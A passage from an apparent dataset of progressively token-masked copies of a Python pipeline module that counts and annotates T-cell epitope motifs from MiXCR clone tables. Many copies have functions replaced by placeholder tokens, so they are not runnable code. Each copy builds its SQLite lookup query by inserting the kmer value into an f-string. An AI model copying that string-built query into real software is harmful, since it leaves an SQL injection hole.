pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"import luigi\nimport logging\nimport subprocess\nimport logging\nimport pandas as pd\nimport sqlite3\nfrom os.path import join, dirname, basename\nfrom .mixcr import MixcrClones\nfrom .tcem_aa_db import TcemNrAaDb\nfrom ....pipeline.utils.cap_task import CapTask\nfrom ....pipeline.config import PipelineConfig\nlogger = logging.getLogger('tcems')\n\n\ndef countit(objs):\n \"\"\"Return a dict with counts for each item in a list.\"\"\"\n out = {}\n for el in objs:\n out[el] = 1 + out.get(el, 0)\n out = {k: v for k, v in out.items()}\n return out\n\n\ndef get_binding_motifs(seq):\n \"\"\"Return a dict of dicts with counts for different TCEM motifs.\"\"\"\n out = {'type_1': [], 'type_2a': [], 'type_2b': []}\n for i in range(len(seq) - 9 + 1):\n kmer = seq[i:i + 9]\n out['type_1'].append(kmer[3:8])\n for i in range(len(seq) - 15 + 1):\n kmer = seq[i:i + 15]\n tail = kmer[5] + kmer[7] + kmer[9] + kmer[10]\n out['type_2a'].append(kmer[4] + tail)\n out['type_2b'].append(kmer[2] + tail)\n counted = {k: countit(v) for k, v in out.items()}\n return counted\n\n\ndef parse_mixcr_table(filepath):\n \"\"\"Return counts of TCEMs for a set of CDR3 sequences.\"\"\"\n tbl = pd.read_csv(filepath, sep='\\t')\n out = {}\n for _, row in tbl.iterrows():\n motifs = get_binding_motifs(row['aaSeqImputedCDR3'])\n for kind, motif_counts in motifs.items():\n for motif, count in motif_counts.items():\n for mykind in [kind, 'all_types']:\n key = mykind, motif\n if key not in out:\n out[key] = {'num_unique_seqs': 0, 'num_clones': 0,\n 'num_unique_occurences': 0,\n 'num_clonal_occurences': 0}\n out[key]['num_unique_seqs'] += 1\n out[key]['num_clones'] += row['cloneCount']\n out[key]['num_unique_occurences'] += count\n out[key]['num_clonal_occurences'] += count * row[\n 'cloneCount']\n return out\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\nlogger = logging.getLogger('tcems')\n\n\ndef countit(objs):\n \"\"\"Return a dict with counts for each item in a list.\"\"\"\n out = {}\n for el in objs:\n out[el] = 1 + out.get(el, 0)\n out = {k: v for k, v in out.items()}\n return out\n\n\ndef get_binding_motifs(seq):\n \"\"\"Return a dict of dicts with counts for different TCEM motifs.\"\"\"\n out = {'type_1': [], 'type_2a': [], 'type_2b': []}\n for i in range(len(seq) - 9 + 1):\n kmer = seq[i:i + 9]\n out['type_1'].append(kmer[3:8])\n for i in range(len(seq) - 15 + 1):\n kmer = seq[i:i + 15]\n tail = kmer[5] + kmer[7] + kmer[9] + kmer[10]\n out['type_2a'].append(kmer[4] + tail)\n out['type_2b'].append(kmer[2] + tail)\n counted = {k: countit(v) for k, v in out.items()}\n return counted\n\n\ndef parse_mixcr_table(filepath):\n \"\"\"Return counts of TCEMs for a set of CDR3 sequences.\"\"\"\n tbl = pd.read_csv(filepath, sep='\\t')\n out = {}\n for _, row in tbl.iterrows():\n motifs = get_binding_motifs(row['aaSeqImputedCDR3'])\n for kind, motif_counts in motifs.items():\n for motif, count in motif_counts.items():\n for mykind in [kind, 'all_types']:\n key = mykind, motif\n if key not in out:\n out[key] = {'num_unique_seqs': 0, 'num_clones': 0,\n 'num_unique_occurences': 0,\n 'num_clonal_occurences': 0}\n out[key]['num_unique_seqs'] += 1\n out[key]['num_clones'] += row['cloneCount']\n out[key]['num_unique_occurences'] += count\n out[key]['num_clonal_occurences'] += count * row[\n 'cloneCount']\n return out\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n\n\ndef countit(objs):\n \"\"\"Return a dict with counts for each item in a list.\"\"\"\n out = {}\n for el in objs:\n out[el] = 1 + out.get(el, 0)\n out = {k: v for k, v in out.items()}\n return out\n\n\ndef get_binding_motifs(seq):\n \"\"\"Return a dict of dicts with counts for different TCEM motifs.\"\"\"\n out = {'type_1': [], 'type_2a': [], 'type_2b': []}\n for i in range(len(seq) - 9 + 1):\n kmer = seq[i:i + 9]\n out['type_1'].append(kmer[3:8])\n for i in range(len(seq) - 15 + 1):\n kmer = seq[i:i + 15]\n tail = kmer[5] + kmer[7] + kmer[9] + kmer[10]\n out['type_2a'].append(kmer[4] + tail)\n out['type_2b'].append(kmer[2] + tail)\n counted = {k: countit(v) for k, v in out.items()}\n return counted\n\n\ndef parse_mixcr_table(filepath):\n \"\"\"Return counts of TCEMs for a set of CDR3 sequences.\"\"\"\n tbl = pd.read_csv(filepath, sep='\\t')\n out = {}\n for _, row in tbl.iterrows():\n motifs = get_binding_motifs(row['aaSeqImputedCDR3'])\n for kind, motif_counts in motifs.items():\n for motif, count in motif_counts.items():\n for mykind in [kind, 'all_types']:\n key = mykind, motif\n if key not in out:\n out[key] = {'num_unique_seqs': 0, 'num_clones': 0,\n 'num_unique_occurences': 0,\n 'num_clonal_occurences': 0}\n out[key]['num_unique_seqs'] += 1\n out[key]['num_clones'] += row['cloneCount']\n out[key]['num_unique_occurences'] += count\n out[key]['num_clonal_occurences'] += count * row[\n 'cloneCount']\n return out\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n\n\ndef countit(objs):\n \"\"\"Return a dict with counts for each item in a list.\"\"\"\n out = {}\n for el in objs:\n out[el] = 1 + out.get(el, 0)\n out = {k: v for k, v in out.items()}\n return out\n\n\n<function token>\n\n\ndef parse_mixcr_table(filepath):\n \"\"\"Return counts of TCEMs for a set of CDR3 sequences.\"\"\"\n tbl = pd.read_csv(filepath, sep='\\t')\n out = {}\n for _, row in tbl.iterrows():\n motifs = get_binding_motifs(row['aaSeqImputedCDR3'])\n for kind, motif_counts in motifs.items():\n for motif, count in motif_counts.items():\n for mykind in [kind, 'all_types']:\n key = mykind, motif\n if key not in out:\n out[key] = {'num_unique_seqs': 0, 'num_clones': 0,\n 'num_unique_occurences': 0,\n 'num_clonal_occurences': 0}\n out[key]['num_unique_seqs'] += 1\n out[key]['num_clones'] += row['cloneCount']\n out[key]['num_unique_occurences'] += count\n out[key]['num_clonal_occurences'] += count * row[\n 'cloneCount']\n return out\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n\n\ndef countit(objs):\n \"\"\"Return a dict with counts for each item in a list.\"\"\"\n out = {}\n for el in objs:\n out[el] = 1 + out.get(el, 0)\n out = {k: v for k, v in out.items()}\n return out\n\n\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n <function token>\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n <function token>\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n <function token>\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = 